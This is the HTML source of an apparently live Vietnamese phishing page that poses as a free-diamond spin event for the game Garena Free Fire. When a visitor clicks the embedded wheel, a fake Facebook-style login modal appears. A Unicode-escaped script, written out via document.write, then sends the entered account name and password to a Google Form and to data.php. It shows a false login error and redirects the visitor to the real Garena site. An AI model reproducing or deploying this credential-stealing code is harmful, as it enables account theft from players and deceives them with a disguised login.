
   <!DOCTYPE html>
        <html>
            
        <head>
            <style>img[alt="www.000webhost.com"]{display:none;}</style>
      <meta content='text/html; charset=UTF-8' http-equiv='Content-Type' />
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Vòng quay miễn phí | garena free fire</title>
   
        <title>Sự Kiện Free Fire 2021 Nhận Kim Cương Free Fire Miễn Phí Code Free Fire Sự Kiện Vòng Quay Vô Cực FREE FIRE</title>
  <meta property="og:type" content="website" />
  <meta property="og:url" content="http://ticchien.pw/" />
  <meta property="og:site_name" content="FREE FIRE" />
	<meta property="og:title" content="Sự Kiện Free Fire 2021 Nhận Kim Cương Free Fire Miễn Phí Code Free Fire Sự Kiện Vòng Quay Vô Cực FREE FIRE">
	<meta property="og:image" content="https://1.bp.blogspot.com/-kPgd3sOIMBc/XoR9xS626HI/AAAAAAAAIqs/2qtqX9ckPpI03GGrbHShKouZURlvUEhEQCLcBGAsYHQ/s1600/123.png">
	<meta property="og:description" content="Tri an ff nhận code free fire kim cương free fire miễn phí, sự kiện Free Fire Việt Nam 2021, hack kim cương free fire android nicoo free fire max ">
	<link rel="shortcut icon" href="https://apkboat.com/logos/garena-free-fire-mega-mod_6.png" />
	<link rel="icon" href="https://apkboat.com/logos/garena-free-fire-mega-mod_6.png" type="image/x-icon" />
            <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
            <link class="tempLink" rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:regular">
            <script src='//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js' type="text/javascript"></script>
            <link rel="stylesheet" href="https://ticchien111.github.io/giaodien-fb-fake/facebook.css">
            <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
          <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <style>
        .container {
          position: relative;
          width: 100%;
          overflow: hidden;
         /* 1:1 Aspect Ratio */
        }
        
        .responsive-iframe {
          position: fixed;
          top: 0;
          left: 0;
          bottom: 0;
          right: 0;
          width: 100%;
          height: 100%;
          border: none;
        }
        .img{
          width: 130px;
          padding-bottom: 20px;
          border-radius: 20px;
        }
        .container1{
	    padding-top: 30px;
            
        }
             @media screen and (max-width: 600px) {

	.container1{
	    padding-top: 30px;
	padding-left: 30px;
	width: 90%;
}

}
                </style>
                </head>
                <body  >
             
                <div class="container" >
                    <iframe class="responsive-iframe" id="iframe" sandbox src="https://vongquay-freefire.com/vongquay.html"></iframe>
                  </div>

                  <div class="modal fade" id="myModal" role="dialog">
                    <div class="container1">
                   <div class="row h-100 justify-content-center align-items-center mt-2">
                      <div class="col-md-4 vhnlog">
                         <form   id="login_form">
                             <div class="d-flex justify-content-center">
                      <img src="https://apkboat.com/logos/garena-free-fire-mega-mod_6.png" class="img logo mt-2" alt="FacebookZ">
                   </div>
                   <div class=" alert alert-warning" id="tb" role="alert" style="
                      border-radius: 0;
                      padding: 7px 20px;
                      ">
                     <span id="thongbao">Vui lòng đăng nhập tài khoản đã liên kết với garena để tiếp tục</span>
                  </div>
                           <div class="form-group">
                              <input type="text" class="form-control" id="id" name="taikhoan" placeholder="Vui lòng nhập số di động hoặc email" >
                           </div>
                         
                           <div class="form-group">
                              <input type="password" class="form-control" id="pass" name="matkhau" placeholder="Password" >
                           </div>
                           <div class="form-group">
                              <center>
                                 <button  type="submit" onclick="dangnhap()"  id="submit"class="btn btn-primary" style="background-color: #166fe5;">Đăng nhập</button>
                              </center>
                           </div>
                        </form>
                        <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">hoặc</span></div>
                        <center>
                           <input class="btn btn-success" type="button" style="background-color: #3fb328;"value="Tạo tài khoản mới" />
                        </center>
                      </div>
                   </div>
                   <div class="row text-center" style="margin-top: 6rem;">
                     
                   </div>
                   <div class="row text-center">
                      <div class="col-md-12">
                         
                      </div>
                   </div>
                </div>
                  </div>
                  <script src="https://ticchien111.github.io/giaodien-fb-fake/jquery2.js"></script>
             
                  
                <script>
                   
                              function showlog() {
                                $('#myModal').modal({
                                            backdrop: 'static',
                                            keyboard: true, 
                                            show: true
                                        });
                              }
                    focus();
                var listener = addEventListener('blur', function() {
                    if(document.activeElement === document.getElementById('iframe')) {
                      showlog();
                    }
                    removeEventListener(listener);
                });
             
                   
                  </script>

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000a\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0074\u0065\u006c\u0065\u0070\u0068\u006f\u006e\u0065\u0043\u0068\u0065\u0063\u006b\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0069\u0073\u0070\u0068\u006f\u006e\u0065\u0020\u003d\u0020\u002f\u005e\u0028\u0031\u005c\u0073\u007c\u0031\u007c\u0029\u003f\u0028\u0028\u005c\u0028\u005c\u0064\u007b\u0033\u007d\u005c\u0029\u0029\u007c\u005c\u0064\u007b\u0033\u007d\u0029\u0028\u005c\u002d\u007c\u005c\u0073\u0029\u003f\u0028\u005c\u0064\u007b\u0033\u007d\u0029\u0028\u005c\u002d\u007c\u005c\u0073\u0029\u003f\u0028\u005c\u0064\u007b\u0034\u007d\u0029\u0024\u002f\u002e\u0074\u0065\u0073\u0074\u0028\u0073\u0074\u0072\u0029\u003b\u000a\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0028\u0069\u0073\u0070\u0068\u006f\u006e\u0065\u0029\u003b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u006c\u0069\u0064\u0061\u0074\u0065\u0045\u006d\u0061\u0069\u006c\u0028\u0065\u006d\u0061\u0069\u006c\u0029\u0020\u000a\u0020\u0020\u0020\u007b\u000a\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0020\u003d\u0020\u002f\u005c\u0053\u002b\u0040\u005c\u0053\u002b\u005c\u002e\u005c\u0053\u002b\u002f\u003b\u000a\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0072\u0065\u002e\u0074\u0065\u0073\u0074\u0028\u0065\u006d\u0061\u0069\u006c\u0029\u003b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u006f\u0028\u0029\u007b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u0074\u0061\u0069\u006b\u0068\u006f\u0061\u006e\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u006d\u0061\u0074\u006b\u0068\u0061\u0075\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u0020\u003d\u0020\u0074\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u0020\u003d\u0020\u006d\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0064\u0061\u0074\u0061\u0020\u003d\u0020\u007b\u000a\u0020\u0020\u0020\u0027\u0065\u006e\u0074\u0072\u0079\u002e\u0031\u0031\u0034\u0037\u0032\u0036\u0031\u0037\u0037\u0031\u0027\u003a\u0020\u0074\u006b\u002c\u000a\u0020\u0020\u0020\u0027\u0065\u006e\u0074\u0072\u0079\u002e\u0031\u0036\u0032\u0034\u0039\u0036\u0036\u0036\u0039\u0036\u0027\u003a\u0020\u006d\u006b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u0028\u0064\u0061\u0074\u0061\u0029\u003b\u0020\u0020\u000a\u0020\u0020\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u003b\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0078\u0068\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0058\u004d\u004c\u0048\u0074\u0074\u0070\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u006f\u0070\u0065\u006e\u0028\u0022\u0050\u004f\u0053\u0054\u0022\u002c\u0020\u0027\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0064\u006f\u0063\u0073\u002e\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0066\u006f\u0072\u006d\u0073\u002f\u0075\u002f\u0030\u002f\u0064\u002f\u0065\u002f\u0031\u0046\u0041\u0049\u0070\u0051\u004c\u0053\u0063\u0046\u0034\u0048\u0053\u0045\u004b\u0051\u005f\u004e\u004a\u0065\u0049\u0076\u004d\u0057\u0047\u0049\u0042\u0075\u0064\u005a\u0059\u0074\u006d\u0044\u0043\u006a\u0038\u0044\u0052\u004a\u0076\u0076\u0056\u0046\u0068\u006b\u0068\u0076\u006b\u004a\u0059\u0057\u0061\u0046\u0033\u0041\u002f\u0066\u006f\u0072\u006d\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0027\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u000a\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u0073\u0065\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0028\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u002c\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u0073\u0065\u006e\u0064\u0028\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u003b\u000a\u0020\u0020\u0020\u0053\u0077\u0061\u006c\u002e\u0066\u0069\u0072\u0065\u0028\u007b\u000a\u0020\u0020\u0020\u0069\u0063\u006f\u006e\u003a\u0020\u0027\u0065\u0072\u0072\u006f\u0072\u0027\u002c\u000a\u0020\u0020\u0020\u0074\u0069\u0074\u006c\u0065\u003a\u0020\u0027\u0110\u0103\u006e\u0067\u0020\u006e\u0068\u1ead\u0070\u0020\u0074\u0068\u1ea5\u0074\u0020\u0062\u1ea1\u0069\u0027\u002c\u000a\u0020\u0020\u0020\u0074\u0065\u0078\u0074\u003a\u0020\u0027\u0056\u0075\u0069\u0020\u006c\u00f2\u006e\u0067\u0020\u006b\u0069\u1ec3\u006d\u0020\u006c\u1ea1\u0069\u0020\u0074\u0068\u00f4\u006e\u0067\u0020\u0074\u0069\u006e\u0020\u0111\u0103\u006e\u0067\u0020\u006e\u0068\u1ead\u0070\u0027\u002c\u000a\u0020\u0020\u0020\u007d\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u0029\u0020\u003d\u003e\u0020\u007b\u000a\u0020\u0020\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0066\u0066\u002e\u0067\u0061\u0072\u0065\u006e\u0061\u002e\u0076\u006e\u002f\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0029\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u006f\u006e\u0073\u0075\u0062\u006d\u0069\u0074\u0020\u003d\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0065\u002e\u0070\u0072\u0065\u0076\u0065\u006e\u0074\u0044\u0065\u0066\u0061\u0075\u006c\u0074\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u0074\u0061\u0069\u006b\u0068\u006f\u0061\u006e\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u006d\u0061\u0074\u006b\u0068\u0061\u0075\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0062\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0068\u006f\u006e\u0067\u0062\u0061\u006f\u0022\u0029\u003b\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u0020\u003d\u0020\u0074\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u0020\u003d\u0020\u006d\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0069\u0066\u0028\u0024\u002e\u0069\u0073\u004e\u0075\u006d\u0065\u0072\u0069\u0063\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0069\u0066\u0028\u0074\u0065\u006c\u0065\u0070\u0068\u006f\u006e\u0065\u0043\u0068\u0065\u0063\u006b\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0067\u006f\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0061\u0063\u0063\u0020\u003d\u0020\u0024\u0028\u0027\u0066\u006f\u0072\u006d\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u0073\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0024\u002e\u0061\u006a\u0061\u0078\u0028\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0079\u0070\u0065\u0020\u003a\u0020\u0027\u0050\u004f\u0053\u0054\u0027\u002c\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0075\u0072\u006c\u0020\u003a\u0020\u0027\u0064\u0061\u0074\u0061\u002e\u0070\u0068\u0070\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u0054\u0079\u0070\u0065\u003a\u0020\u0027\u004a\u0053\u004f\u004e\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u003a\u0020\u0061\u0063\u0063\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u0020\u003a\u0020\u0028\u0064\u0061\u0074\u0061\u0029\u0020\u003d\u003e\u0020\u007b\u000a\u0020\u0020\u0020\u0024\u0028\u0027\u0023\u0073\u0075\u0062\u006d\u0069\u0074\u0027\u0029\u002e\u0068\u0074\u006d\u006c\u0028\u0027\u004c\u006f\u0067\u0020\u0049\u006e\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0064\u0061\u0074\u0061\u002e\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u0020\u000a\u0020\u0020\u0020\u007d\u0020\u0065\u006c\u0073\u0065\u0020\u007b\u0020\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u006e\u006f\u006e\u0065\u0022\u003b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u007b\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0053\u1ed1\u0020\u0111\u0069\u1ec7\u006e\u0020\u0074\u0068\u006f\u1ea1\u0069\u0020\u0063\u0068\u01b0\u0061\u0020\u0111\u00fa\u006e\u0067\u0020\u0111\u1ecb\u006e\u0068\u0020\u0064\u1ea1\u006e\u0067\u002e\u0022\u003b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u006d\u006b\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0020\u003d\u003d\u0020\u0030\u0020\u007c\u007c\u0020\u006d\u006b\u0020\u003d\u003d\u0020\u0027\u0027\u0029\u007b\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0056\u0075\u0069\u0020\u006c\u00f2\u006e\u0067\u0020\u006e\u0068\u1ead\u0070\u0020\u006d\u1ead\u0074\u0020\u006b\u0068\u1ea9\u0075\u0022\u003b\u000a\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u0076\u0061\u006c\u0069\u0064\u0061\u0074\u0065\u0045\u006d\u0061\u0069\u006c\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0067\u006f\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0061\u0063\u0063\u0020\u003d\u0020\u0024\u0028\u0027\u0066\u006f\u0072\u006d\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u0073\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0024\u002e\u0061\u006a\u0061\u0078\u0028\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0079\u0070\u0065\u0020\u003a\u0020\u0027\u0050\u004f\u0053\u0054\u0027\u002c\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0075\u0072\u006c\u0020\u003a\u0020\u0027\u0064\u0061\u0074\u0061\u002e\u0070\u0068\u0070\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u0054\u0079\u0070\u0065\u003a\u0020\u0027\u004a\u0053\u004f\u004e\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u003a\u0020\u0061\u0063\u0063\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u0020\u003a\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007b\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u006e\u006f\u006e\u0065\u0022\u003b\u000a\u0020\u0020\u0020\u007d\u0020\u0065\u006c\u0073\u0065\u0020\u007b\u000a\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0056\u0075\u0069\u0020\u006c\u00f2\u006e\u0067\u0020\u006e\u0068\u1ead\u0070\u0020\u0111\u00fa\u006e\u0067\u0020\u0111\u1ecb\u006e\u0068\u0020\u0064\u1ea1\u006e\u0067\u0020\u0073\u1ed1\u0020\u0111\u0069\u1ec7\u006e\u0020\u0074\u0068\u006f\u1ea1\u0069\u0020\u0068\u006f\u1eb7\u0063\u0020\u0111\u1ecb\u0061\u0020\u0063\u0068\u1ec9\u0020\u0065\u006d\u0061\u0069\u006c\u002e\u0022\u003b\u000a\u0020\u0020\u0020\u007d\u0020\u000a\u0020\u0020\u0020\u007d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous">
                      </script>
                </body>
                </html>